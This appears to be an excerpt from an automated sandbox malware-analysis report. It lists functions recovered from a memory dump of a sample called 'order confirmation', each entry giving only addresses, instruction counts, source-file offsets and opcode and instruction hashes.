                                                    • Instruction ID: 0a5aa75f849e0a99408c726ee88d11e09635ffe46a2be946bdc6de9309659c53
                                                    • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                    • Instruction Fuzzy Hash: 1D51B931D0120AEFEF16DA94C880BAFBB75AF88324F15466AE611772A0D7309D41CBA0
                                                    Function 01478B28 Relevance: .2, Instructions: 152COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4eff83488d8b22bd34b0f4db4a76b56623a729124e601683ab5e8085efd87551
                                                    • Instruction ID: 35d81268e410196fbea903dec03530773ff59b2e736095cf690d43550d0317ef
                                                    • Opcode Fuzzy Hash: 4eff83488d8b22bd34b0f4db4a76b56623a729124e601683ab5e8085efd87551
                                                    • Instruction Fuzzy Hash: 2641C7717016139FE729DB2EC898BBBBB9AEF90620F08851BF955873A1D730D801C691
                                                    Function 0143CBF0 Relevance: .1, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b2214d85ac141c258f660bd30745e1664a913db56a4c73ea1f9ff26162619710
                                                    • Instruction ID: e9e2c7ed6c658ceffaa7e961ed342d6153b0b80997a06b2f8083561fdc86804e
                                                    • Opcode Fuzzy Hash: b2214d85ac141c258f660bd30745e1664a913db56a4c73ea1f9ff26162619710
                                                    • Instruction Fuzzy Hash: D2517E71900216DFCB20DFA9C9C499FBBB9FB88758B56451BE505B7710DB34AD02CB90
                                                    Function 013EA430 Relevance: .1, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a50a09a040cdc79ab20b7a11204ccb49fca40e9f7fa33efcfa9afd0acbb884f1
                                                    • Instruction ID: 72fb874733ab4425c350415de26804963bf440cf8b564df22f890785bdc79503
                                                    • Opcode Fuzzy Hash: a50a09a040cdc79ab20b7a11204ccb49fca40e9f7fa33efcfa9afd0acbb884f1
                                                    • Instruction Fuzzy Hash: 19410A72640325DBDB39EF6DD885BAB7BA4EB9470CF82042DFD069B3A1D77198408750
                                                    Function 0147A9D3 Relevance: .1, Instructions: 139COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                    • Instruction ID: 649fd70a19eb215ac787514353bebd4d3008e8636f1956355b21c76e9fbe2dc6
                                                    • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                    • Instruction Fuzzy Hash: EC4107726007069FDB25DF28C984AAFB7A9FF90214B19462FEA1287750EB30ED15C7D0
                                                    Function 013E01F8 Relevance: .1, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c04673717a628686bc3cf269c0c1b261f41c666d291e4debc3c989aecf9a430f
                                                    • Instruction ID: b3d067335f0cc8773dc54797923cd5f813c0870d56d272de2b956cb461b45911
                                                    • Opcode Fuzzy Hash: c04673717a628686bc3cf269c0c1b261f41c666d291e4debc3c989aecf9a430f
                                                    • Instruction Fuzzy Hash: 3D41BC31A012299BDB19DF98C444AEEB7F4AF48618F14812AF815F7290D7B49C42CBA4
                                                    Function 013DEBFC Relevance: .1, Instructions: 138COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 067ccdcb9cc1c6d526740e02fd7d7e8d7598a97081b6375834e98b620e7b52b2
                                                    • Instruction ID: 3d70314642ff9078a94f5af940191c93f4338db5f974126fbfea87b81fc43006
                                                    • Opcode Fuzzy Hash: 067ccdcb9cc1c6d526740e02fd7d7e8d7598a97081b6375834e98b620e7b52b2
                                                    • Instruction Fuzzy Hash: 0141C5722043059FDB20DF28D884A67BBE9FF88218F45483EE957C7725EB31E8498B50
                                                    Function 013F2750 Relevance: .1, Instructions: 137COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                    • Instruction ID: 2e69c5f5dbae9f070e9cdae728928d511327879d4937fcd906120e87d58bb6b2
                                                    • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                    • Instruction Fuzzy Hash: CE515B75A00625CFCB15CF58C480AAEF7B1FF84710F6881AAD915A7761D730EE82CB90
                                                    Function 013B6154 Relevance: .1, Instructions: 133COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7795e176363a1b2b24a0610728efcc31c4cf3bd9df28aa1caec962265d9a0f91
                                                    • Instruction ID: 9ef1f181e0637dbee364f8fe5e98df158aab89932bb17d4c071d70e4a5804060
                                                    • Opcode Fuzzy Hash: 7795e176363a1b2b24a0610728efcc31c4cf3bd9df28aa1caec962265d9a0f91
                                                    • Instruction Fuzzy Hash: EB51FCB0900116DBEB25CB2CCC41BE9BBB5FF15318F1582A9D6199B6D6E73459C1CF40
                                                    Function 013B0BCD Relevance: .1, Instructions: 130COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b62027f26c22752f1ac3d0577ee766f5111472e4290d72f9d901b962952f4406
                                                    • Instruction ID: abfc581703877dcb43a8fd177cd80a790d8b1d3424294d62ad4e9aa9e4d33635
                                                    • Opcode Fuzzy Hash: b62027f26c22752f1ac3d0577ee766f5111472e4290d72f9d901b962952f4406
                                                    • Instruction Fuzzy Hash: E8419431A002299BDF21DF6DC980BEF77B8EF44754F0104AAEA08AB651E774DE81CB51
                                                    Function 0147866E Relevance: .1, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                    • Instruction ID: 0aedfbf193de9bacae90cb5e94742b387544c2506948ca782115765ef3e44c95
                                                    • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                    • Instruction Fuzzy Hash: 7C419375B00206ABDB15DF99CC88AEFBBBAAF98600F14406AE905E7361D670DD15C7A0
                                                    Function 013B0887 Relevance: .1, Instructions: 128COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 503d01a17ad4751c9fb53dbe0ef747991f4a6cd4a2d7aa67d05844da553c072c
                                                    • Instruction ID: 1752f2fc36033e8176f52aee69391f620b5106744b96bd2a292499b7ec789417
                                                    • Opcode Fuzzy Hash: 503d01a17ad4751c9fb53dbe0ef747991f4a6cd4a2d7aa67d05844da553c072c
                                                    • Instruction Fuzzy Hash: 1041B2716007059FE329CF29C5C0967BBF9FF49218B144A6EE656C6E60F731E845CB50
                                                    Function 013DA470 Relevance: .1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4336cb4546881da184ef288ccfa97a4a2fd3470ed3198150d40fbb1136b32947
                                                    • Instruction ID: a87561f55a2eaafa1b16872887bdb2a8932fc8f8ebf3b40f79c5a9b6a1d0390d
                                                    • Opcode Fuzzy Hash: 4336cb4546881da184ef288ccfa97a4a2fd3470ed3198150d40fbb1136b32947
                                                    • Instruction Fuzzy Hash: 0F41D132900209CFDB21DF6CE6947EE7BB5FB54318F99015AE411B73A5DB749900CBA0
                                                    Function 013B8BF0 Relevance: .1, Instructions: 124COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c61f445504b6d6595f07ef710d96487ae0189a97933f5c9ff029ad7e9b04f703
                                                    • Instruction ID: 33f8c83051e93d66ec3bfdab891d95271cad686c841cadd90f5bd628c6a172d6
                                                    • Opcode Fuzzy Hash: c61f445504b6d6595f07ef710d96487ae0189a97933f5c9ff029ad7e9b04f703
                                                    • Instruction Fuzzy Hash: FE412A71900206CBDB249F5CC880ADEBBBDFB94708F69806EE6119BA65E374D801CB90
                                                    Function 013A8918 Relevance: .1, Instructions: 123COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0350b912c26f9c65aa1bab411c35e0de92007bb019c6d2d9fd82c5f49f046234
                                                    • Instruction ID: 5daa46d9836135a9aba56f158d72f7cdbc1919c4003b5d087ac298b770cad4a0
                                                    • Opcode Fuzzy Hash: 0350b912c26f9c65aa1bab411c35e0de92007bb019c6d2d9fd82c5f49f046234
                                                    • Instruction Fuzzy Hash: 1D415B765083069ED312DF69C840A6BF7E9EF84B58F40092EF984D7260E730DE058B97
                                                    Function 013AA020 Relevance: .1, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                    • Instruction ID: 1ec7b0c9c74e322dd0f88ce1f5a4bd4d78dec4b00badf4da9f77c4956ab97959
                                                    • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                    • Instruction Fuzzy Hash: 99418E36A00215DBDB22DE2E8454BBBBB71EB50758F95807FE944CB380D6339D40CB90
                                                    Function 013B09AD Relevance: .1, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 166fc1a60092a7976d8e731a975667cae00d7e95f7351ccd173e143c07470643
                                                    • Instruction ID: 5ac65ab517e7605606a2ef8ac99bfc2b3fb91078ab26af1d73b86c9ba8a4c566
                                                    • Opcode Fuzzy Hash: 166fc1a60092a7976d8e731a975667cae00d7e95f7351ccd173e143c07470643
                                                    • Instruction Fuzzy Hash: 2D417D71600605DFE725CF18C880B67BBF4FF54718F248A6AE5498B661E771E941CB90
                                                    Function 013E0710 Relevance: .1, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                    • Instruction ID: ce612874ed47ccc5cdbfa0832d6ee0d68ac1c25aece0684ded5b8edddf29b484
                                                    • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                    • Instruction Fuzzy Hash: 5F414B71A00719EFDB28CFA8C994AAABBF8FF18704B10496DE556D7690D370EA44CF50
                                                    Function 013B262C Relevance: .1, Instructions: 119COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: fb87fa0ad3d68683d4a44fcd5e56dfff1e33bfaa3954fd6e9a2b0cdfa48afe05
                                                    • Instruction ID: 8c1b245e0ed26ada7ef556fce328ca0f1b40ee682b027b69ddf795725a608cee
                                                    • Opcode Fuzzy Hash: fb87fa0ad3d68683d4a44fcd5e56dfff1e33bfaa3954fd6e9a2b0cdfa48afe05
                                                    • Instruction Fuzzy Hash: 7B41C570501705CFC722EF29C98179AB7B5FF54328F15826EC6169BAB2EB30A941CF51
                                                    Function 013EC8F9 Relevance: .1, Instructions: 116COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3e79eda4cd96ee5f47bc19a82abcd7f3658a58ba9fb0bf68dfc58a5973ba30c3
                                                    • Instruction ID: 5c4a497a667fc2f35a5664992ba964137a86fdca4e1851a61f61b34605417e1c
                                                    • Opcode Fuzzy Hash: 3e79eda4cd96ee5f47bc19a82abcd7f3658a58ba9fb0bf68dfc58a5973ba30c3
                                                    • Instruction Fuzzy Hash: 91318DB1A01355DFDB12DF68D040799BBF0FB09728F2081AED119EB291D3369942CF90
                                                    Function 014307C3 Relevance: .1, Instructions: 114COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 814f22e8578c69b2cb007e428b7ff358ac847f0f31c0373c0ff1590f6dbbb00e
                                                    • Instruction ID: 8e1184ff6aa432ae46639354b2dcdeafb088c12159a40353a3a7aac5ea03996d
                                                    • Opcode Fuzzy Hash: 814f22e8578c69b2cb007e428b7ff358ac847f0f31c0373c0ff1590f6dbbb00e
                                                    • Instruction Fuzzy Hash: 5E419F725043019FD720DF29C844B9BBBE8FF88664F004A2EF598D72A0D770D905CB92
                                                    Function 014305A7 Relevance: .1, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5c39533236ed01f7c0cb168aba669d95881252f1caaa7cd5a619cd8495c118b2
                                                    • Instruction ID: a188d8e4583dfcb4714653f7f6ab92c2e8b3b9d2f35d9bbe0943167f344fdad2
                                                    • Opcode Fuzzy Hash: 5c39533236ed01f7c0cb168aba669d95881252f1caaa7cd5a619cd8495c118b2
                                                    • Instruction Fuzzy Hash: 5D4191726046429BD320DF6CD840A6BB7A9BFC8700F14462EF95997690E730E915C7A6
                                                    Function 013B4859 Relevance: .1, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: cfdd111e5eef4b65142f8109dcb4e3eef42f3b1143dd7cd9c79efe5c778a7954
                                                    • Instruction ID: 4f3d8fd11934d5924a3d888911965c550bba78514181ddef747bc8757bdccd5c
                                                    • Opcode Fuzzy Hash: cfdd111e5eef4b65142f8109dcb4e3eef42f3b1143dd7cd9c79efe5c778a7954
                                                    • Instruction Fuzzy Hash: EC41F5302003069BDB25DF2CD8C4B6ABBE9FF80758F15442DE7468B6A2EB30D841CB95
                                                    Function 013C02E1 Relevance: .1, Instructions: 106COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                    • Instruction ID: 4c0d2d8ab51ec870495d4a52ad77e5a8bc175d2da610622dbce3008cc6f39702
                                                    • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                    • Instruction Fuzzy Hash: CE311531A04284EBDB118B6CCC84BDBBFE8AF14754F0441AAF455D7352D774D844CBA0
                                                    Function 0145E3DB Relevance: .1, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bba513d0135bbc56ff4e53c9d9d7420a1ca1bc4fa29a8c823a34f88b16b984ad
                                                    • Instruction ID: 4042f8f4300c9edb4008808c2f9fa86291823258ccd7aa01a940482426e47546
                                                    • Opcode Fuzzy Hash: bba513d0135bbc56ff4e53c9d9d7420a1ca1bc4fa29a8c823a34f88b16b984ad
                                                    • Instruction Fuzzy Hash: F031DC71740716ABDB229F698C41FAFBAA8AB59B54F000039FA04BB391DA74DD01C790
                                                    Function 01464B4B Relevance: .1, Instructions: 104COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2a8dd73b0bf32b030368f35ab463d32a11dca94195d5bc4e9cb8a958e6de959c
                                                    • Instruction ID: 683ab266b356f573e8abcaea6ddf7e3a1e15958304e5dda955de57372f723b14
                                                    • Opcode Fuzzy Hash: 2a8dd73b0bf32b030368f35ab463d32a11dca94195d5bc4e9cb8a958e6de959c
                                                    • Instruction Fuzzy Hash: 7531B3322052018FC721DF1DD880E26BBE9FB80768F4F446EE9558B765DB30AC41DB92
                                                    Function 013B4260 Relevance: .1, Instructions: 102COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7bd458167635d97cb393e9808a2c7b08de5307c74580c99d397b2cd06a53e96b
                                                    • Instruction ID: aac9193ddd4f4ca670b34a1fe8c10b58bd1113161d798bf006c81aa8e634e9cb
                                                    • Opcode Fuzzy Hash: 7bd458167635d97cb393e9808a2c7b08de5307c74580c99d397b2cd06a53e96b
                                                    • Instruction Fuzzy Hash: 4641BD71200B09DFD722CF28C880BD67BE8AB54318F15842EEA9A8B761D730E844CB54
                                                    Function 01464BB0 Relevance: .1, Instructions: 101COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b023085cbacfa2ab1e4b0394f292bcd5c65d5dfb1343d28b7b150f82778c44ec
                                                    • Instruction ID: ee6dcebac9875aa40bfb15d6d15b77ac4778b35729c9a34e57d56ee8a96339be
                                                    • Opcode Fuzzy Hash: b023085cbacfa2ab1e4b0394f292bcd5c65d5dfb1343d28b7b150f82778c44ec
                                                    • Instruction Fuzzy Hash: 6B3192717042018FD720DF28C880A27BBE9FB84728F0A456EF9559B3A4D730EC05CB92
                                                    Function 0142EB1D Relevance: .1, Instructions: 100COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 47e3d378604bcff27649c689a259cbf2e815477e9221cc2f51c7265f9f69a3d3
                                                    • Instruction ID: 05af602a6317a2a449a05fa80f6f5e27e29d9303b026cbd15dc436698f8e5858
                                                    • Opcode Fuzzy Hash: 47e3d378604bcff27649c689a259cbf2e815477e9221cc2f51c7265f9f69a3d3
                                                    • Instruction Fuzzy Hash: 263108313056A29BF322979DC948B567FD8BB44B44F5D00A6EB45AB7F2DB78DC80C220
                                                    Function 014761C3 Relevance: .1, Instructions: 97COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8da30078468123cdf560a8743dc050c09aa25e981cf3baef64204c2539a7dc03
                                                    • Instruction ID: e0423f66c9242823732c7b8c01937d6ab1e76b4b06a096c34a3c36978d6198d6
                                                    • Opcode Fuzzy Hash: 8da30078468123cdf560a8743dc050c09aa25e981cf3baef64204c2539a7dc03
                                                    • Instruction Fuzzy Hash: 6731E475A00616ABEB15DF98CC40BEEB7B6FB44B44F464169E904EB254D770ED00CBA4
                                                    Function 0145483A Relevance: .1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 47e19e6003049d3f178603af37d77926a7e826ea9c8114a87b037099219d6f39
                                                    • Instruction ID: 37f572e869818369d4e9e10206776847ab9a76f0364b8816d86493c223c20122
                                                    • Opcode Fuzzy Hash: 47e19e6003049d3f178603af37d77926a7e826ea9c8114a87b037099219d6f39
                                                    • Instruction Fuzzy Hash: 35316976A4012DABCF61DF58DC85BDE7BB5AB98350F1400E5E908A7261DA30DE91CF90
                                                    Function 013DEB20 Relevance: .1, Instructions: 96COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f6798e3930090f8acc73cf706636bf4046e2ab43e07238c21c24f60bed82dec1
                                                    • Instruction ID: e7f5399f1b9ac150ffff4405e2276929f18979c332cfd1db38aa7cafeefbbb21
                                                    • Opcode Fuzzy Hash: f6798e3930090f8acc73cf706636bf4046e2ab43e07238c21c24f60bed82dec1
                                                    • Instruction Fuzzy Hash: 0231B772E04219AFDB21DFADCC40AAFBBB8EF44754F014436E516DB250D670AE018BA0
                                                    Function 014760B8 Relevance: .1, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0e03966873de51317aae75398429c0d3157a53757b3dd990f65d25adeb4e555f
                                                    • Instruction ID: 9e3170075c0b9cf5a19ad8a3146acc911b387f4d0a9332fe67b9c794d40e9385
                                                    • Opcode Fuzzy Hash: 0e03966873de51317aae75398429c0d3157a53757b3dd990f65d25adeb4e555f
                                                    • Instruction Fuzzy Hash: E831E471700A02EBEB229F6DD840AAFBBBAEB54754F06406EE505DB361DA70DC018B90
